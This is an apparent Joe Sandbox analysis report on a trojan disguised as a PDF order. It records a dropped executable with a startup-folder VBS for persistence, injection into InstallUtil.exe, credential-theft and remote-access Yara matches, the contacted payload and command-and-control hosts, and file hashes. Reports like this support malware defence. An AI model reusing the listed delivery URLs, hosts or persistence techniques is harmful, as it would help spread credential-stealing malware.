                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Queries volume information: C:\Users\user\AppData\Roaming\MaxGeneration.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match File source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1861458458.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3624, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3632, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match File source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1861458458.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3624, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3632, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 111 Scripting | Valid Accounts | 21 Windows Management Instrumentation | 111 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Registry Run Keys / Startup Folder | 2 Registry Run Keys / Startup Folder | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Hidden Files and Directories | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Obfuscated Files or Information | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 1557393
Sample: Order8898327329372938729382...
Startdate: 18/11/2024
Architecture: WINDOWS
Score: 100

DNS/IP (top level): new-visit.com; www.oleonidas.gr; 3 other IPs or domains
Signatures (top level): Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures

Order88983273293729387293828PDF.exe [15 5] started
  DNS/IP: oleonidas.gr 185.78.221.73, 443, 49730, 49734 IPHOSTGRIpDomainGR Greece
  dropped: C:\Users\user\AppData\...\MaxGeneration.exe, PE32
  dropped: C:\Users\user\AppData\...\MaxGeneration.vbs, ASCII
  dropped: C:\...\MaxGeneration.exe:Zone.Identifier, ASCII
  signature: Drops VBS files to the startup folder
  signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  InstallUtil.exe [14 8] started
    DNS/IP: new-visit.com 72.11.156.80, 3791, 49731 ASN-QUADRANET-GLOBALUS United States
    DNS/IP: ipwho.is 195.201.57.90, 443, 49733 HETZNER-ASDE Germany
wscript.exe [1] started
  signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  MaxGeneration.exe [14 2] started
    signature: Multi AV Scanner detection for dropped file
    signature: Machine Learning detection for dropped file
    InstallUtil.exe [3] started

Signature shown in the graph without a connecting edge: Hides that the sample has been downloaded from the Internet (zone.identifier)

| Source | Detection | Scanner | Label |
|---|---|---|---|
| Order88983273293729387293828PDF.exe | 32% | ReversingLabs | Win32.Trojan.Generic |
| Order88983273293729387293828PDF.exe | 36% | Virustotal | |
| Order88983273293729387293828PDF.exe | 100% | Joe Sandbox ML | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Roaming\MaxGeneration.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Roaming\MaxGeneration.exe | 32% | ReversingLabs | Win32.Trojan.Generic |

No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| oleonidas.gr | 0% | Virustotal | |
| www.oleonidas.gr | 0% | Virustotal | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://entityframework-extensions.net/md5-exception | 0% | Avira URL Cloud | safe |
| https://dapper-plus.net/getting-started-mapping#instance-context-mapping. | 0% | Avira URL Cloud | safe |
| https://bulk-operations.net | 0% | Avira URL Cloud | safe |
| https://dapper-plus.net/pricing. | 0% | Avira URL Cloud | safe |
| https://entityframework-extensions.net/) | 0% | Avira URL Cloud | safe |
| http://www.zzzprojects.com | 0% | Avira URL Cloud | safe |
| https://bulk-operations.net/pricing. | 0% | Avira URL Cloud | safe |
| https://www.oleonidas.gr | 0% | Avira URL Cloud | safe |
| https://entityframework-extensions.net/pricing. | 0% | Avira URL Cloud | safe |
| https://dapper-plus.net/getting-started-mapping#instance-context-mapping | 0% | Avira URL Cloud | safe |
| https://entityframework-extensions.net/include-graph). | 0% | Avira URL Cloud | safe |
| https://linqtosql-plus.net/pricing. | 0% | Avira URL Cloud | safe |
| https://www.oleonidas.gr/slim/Wyaiccfynhd.mp3 | 0% | Avira URL Cloud | safe |
| new-visit.com | 0% | Avira URL Cloud | safe |
| https://entityframework-extensions.net/md5-exceptionX | 0% | Avira URL Cloud | safe |
| http://entityframework-plus.net/ | 0% | Avira URL Cloud | safe |
| https://dapper-plus.net/getting-started-mapping#instance-context-mappingGMore | 0% | Avira URL Cloud | safe |
| https://dapper-plus.net | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high |
| oleonidas.gr | 185.78.221.73 | true | false | | unknown |
| ipwho.is | 195.201.57.90 | true | false | | high |
| new-visit.com | 72.11.156.80 | true | true | | unknown |
| www.oleonidas.gr | unknown | unknown | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://www.oleonidas.gr/slim/Wyaiccfynhd.mp3 | false | Avira URL Cloud: safe | unknown |
| new-visit.com | true | Avira URL Cloud: safe | unknown |
| https://ipwho.is/ | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 72.11.156.80 | new-visit.com | United States | 8100 | ASN-QUADRANET-GLOBALUS | true |
| 185.78.221.73 | oleonidas.gr | Greece | 47521 | IPHOSTGRIpDomainGR | false |
| 195.201.57.90 | ipwho.is | Germany | 24940 | HETZNER-ASDE | false |
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1557393
                                                              Start date and time:2024-11-18 08:16:06 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 7m 34s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:9
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:Order88983273293729387293828PDF.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.expl.evad.winEXE@8/6@3/3
                                                              EGA Information:
                                                              • Successful, ratio: 50%
                                                              HCA Information:
                                                              • Successful, ratio: 90%
                                                              • Number of executed functions: 360
                                                              • Number of non-executed functions: 15
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 199.232.214.172
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target MaxGeneration.exe, PID 1344 because it is empty
                                                              • Execution Graph export aborted for target Order88983273293729387293828PDF.exe, PID 180 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 02:16:58 | API Interceptor | 26x Sleep call for process: Order88983273293729387293828PDF.exe modified |
| 02:17:07 | API Interceptor | 1x Sleep call for process: InstallUtil.exe modified |
| 02:17:12 | API Interceptor | 23x Sleep call for process: MaxGeneration.exe modified |
| 07:17:03 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 185.78.221.73 | e-dekont (72).pdf(#U007e56 KB).exe | malicious | Snake Keylogger | |
| 185.78.221.73 | DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe | malicious | DarkCloud | |
| 185.78.221.73 | RFQ 4748.exe | malicious | Snake Keylogger | |
| 185.78.221.73 | PurchOrd_75238572.pdf.exe | malicious | Snake Keylogger | |
| 195.201.57.90 | SPt4FUjZMt.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLine | /?output=json |
| 195.201.57.90 | 765iYbgWn9.exe | malicious | Luca Stealer | /?output=json |
| 195.201.57.90 | 765iYbgWn9.exe | malicious | Luca Stealer | /?output=json |
| 195.201.57.90 | WfKynArKjH.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | /?output=json |
| 195.201.57.90 | ubes6SC7Vd.exe | malicious | Unknown | ipwhois.app/xml/ |
| 195.201.57.90 | cOQD62FceM.exe | malicious | Luca Stealer, Rusty Stealer | /?output=json |
| 195.201.57.90 | Clipper.exe | malicious | Unknown | /?output=json |
| 195.201.57.90 | cOQD62FceM.exe | malicious | Luca Stealer | /?output=json |
| 195.201.57.90 | Cryptor.exe | malicious | Luca Stealer | /?output=json |
| 195.201.57.90 | Cryptor.exe | malicious | Luca Stealer, Rusty Stealer | /?output=json |
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ipwho.is1Eo0gOdDsV.exeGet hashmaliciousQuasarBrowse
                                                                      • 195.201.57.90
                                                                      https://2storageaccounterm67.z13.web.core.windows.net/Win08Ay0Er08d8d77/index.html#Get hashmaliciousTechSupportScamBrowse
                                                                      • 195.201.57.90
                                                                      https://tronblkma8sus7.z13.web.core.windows.net/?click_id=2isqs9oomm3gdtdt2&tid=903&subid=googlesapis.com&ref=googlesapis.com&922%5DGet hashmaliciousTechSupportScamBrowse
                                                                      • 195.201.57.90
                                                                      Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                                      • 15.204.213.5
                                                                      1.cmdGet hashmaliciousUnknownBrowse
                                                                      • 195.201.57.90
                                                                      Exploit Detector.batGet hashmaliciousUnknownBrowse
                                                                      • 195.201.57.90
                                                                      Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                                      • 195.201.57.90
                                                                      fqr76a(1).batGet hashmaliciousUnknownBrowse
                                                                      • 108.181.98.179
                                                                      yde4cz.cmdGet hashmaliciousUnknownBrowse
                                                                      • 195.201.57.90
                                                                      WMdKM7E5Yg.exeGet hashmaliciousQuasarBrowse
                                                                      • 147.135.36.89
                                                                      bg.microsoft.map.fastly.netSyncBackPro64_Setup.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.232.210.172
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.232.210.172
                                                                      ADZP 20 Complex.exeGet hashmaliciousBabadeda, WiperBrowse
                                                                      • 199.232.214.172
                                                                      ADZP 20 Complex.batGet hashmaliciousWiperBrowse
                                                                      • 199.232.214.172
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.232.210.172
                                                                      LauncherPred8.3.37Stablesetup.msiGet hashmaliciousRemcosBrowse
                                                                      • 199.232.210.172
                                                                      0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                      • 199.232.210.172
                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                      • 199.232.210.172
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                      • 199.232.214.172
                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                      • 199.232.214.172
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ASN-QUADRANET-GLOBALUS.main.elfGet hashmaliciousXmrigBrowse
                                                                      • 66.63.187.200
                                                                      mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 104.223.82.201
                                                                      Trykblgens.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 172.93.187.72
                                                                      QUOTATION #46789RFQ_SUPLM_NOV24_SALEH_CONSTRUCTIONS_LLC_PDF.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                                                                      • 66.63.163.134
                                                                      COTIZACIONSyCONSULTA#46789NOV24.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 204.44.127.85
                                                                      RFQ448903423_MAT.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 23.226.128.68
                                                                      .main.elfGet hashmaliciousXmrigBrowse
                                                                      • 66.63.187.200
                                                                      9nke5Ygjp5.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 72.11.142.133
                                                                      Play-Audio_Vmail_Ach Statement Credi....htmlGet hashmaliciousHtmlDropperBrowse
                                                                      • 185.174.100.20
                                                                      Ok7YvjlVmDJI9ajz.exeGet hashmaliciousNanocoreBrowse
                                                                      • 66.63.187.113
                                                                      HETZNER-ASDEfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, StealcBrowse
                                                                      • 176.9.162.205
                                                                      1Eo0gOdDsV.exeGet hashmaliciousQuasarBrowse
                                                                      • 195.201.57.90
                                                                      4c9ebxnhQk.exeGet hashmaliciousUnknownBrowse
                                                                      • 95.216.22.87
                                                                      .main.elfGet hashmaliciousXmrigBrowse
                                                                      • 116.203.43.182
                                                                      https://hacktools.sh/Get hashmaliciousUnknownBrowse
                                                                      • 167.233.14.205
                                                                      http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                      • 88.99.67.51
                                                                      https://www.youtubedownloaderhd.com/Get hashmaliciousUnknownBrowse
                                                                      • 138.201.226.176
                                                                      Unit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 116.202.167.133
                                                                      https://2storageaccounterm67.z13.web.core.windows.net/Win08Ay0Er08d8d77/index.html#Get hashmaliciousTechSupportScamBrowse
                                                                      • 195.201.57.90
                                                                      https://www.google.ml/url?fvg=1YI3fC8whlGPBCiMyiuQ&bhtBf=8EQhXbuMThqowIo0zyCX&sa=t&ndg=afydNw3nDHf9A6uq2MCH&url=amp%2Fiestpcanipaco.edu.pe%2F.r%2Fu1kOgE-SURELILYYWRhcnNoLm1hbGhvdHJhQGphdG8uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                      • 95.217.117.210
                                                                      IPHOSTGRIpDomainGRe-dekont (72).pdf(#U007e56 KB).exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 185.78.221.73
                                                                      DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                                      • 185.78.221.73
                                                                      RFQ 4748.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 185.78.221.73
                                                                      PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 185.78.221.73
                                                                      433.docx.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                      • 185.78.220.138
                                                                      https://ktima-edem.gr/gbzuv/?09812432Get hashmaliciousUnknownBrowse
                                                                      • 93.174.123.195
                                                                      https://andronikidis.gr/3nxw1/?31759481Get hashmaliciousUnknownBrowse
                                                                      • 93.174.123.207
                                                                      Prices_Required.exeGet hashmaliciousDarkCloudBrowse
                                                                      • 185.78.220.151
                                                                      pw5tgKfhDO.elfGet hashmaliciousMiraiBrowse
                                                                      • 185.78.220.47
                                                                      botx.arm.elfGet hashmaliciousUnknownBrowse
                                                                      • 185.78.220.23
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0eXoZ8DeZQxR.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      5nNxM6CCh5.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      PEACE SHIP PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      ZHENGHE 3_Q88 20241118.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      No context
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                      Category:dropped
                                                                      Size (bytes):71954
                                                                      Entropy (8bit):7.996617769952133
                                                                      Encrypted:true
                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):328
                                                                      Entropy (8bit):3.2478978672539016
                                                                      Encrypted:false
                                                                      SSDEEP:6:kK49UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:LDImsLNkPlE99SNxAhUe/3
